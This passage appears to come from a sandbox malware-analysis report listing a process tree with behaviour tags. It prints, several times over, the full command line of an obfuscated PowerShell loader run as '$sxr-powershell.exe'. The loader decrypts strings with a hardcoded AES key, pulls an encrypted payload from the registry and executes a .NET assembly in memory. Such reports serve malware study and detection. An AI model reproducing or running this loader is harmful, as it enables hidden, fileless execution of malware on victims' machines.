$CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Executes dropped EXE
        
        PID:6476
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7152" "2924" "2892" "2928" "0" "0" "2932" "0" "0" "0" "0" "0"
        11⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2648
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6832
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        
        PID:6480
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4708
        
        C:\Windows\$sxr-powershell.exe
        
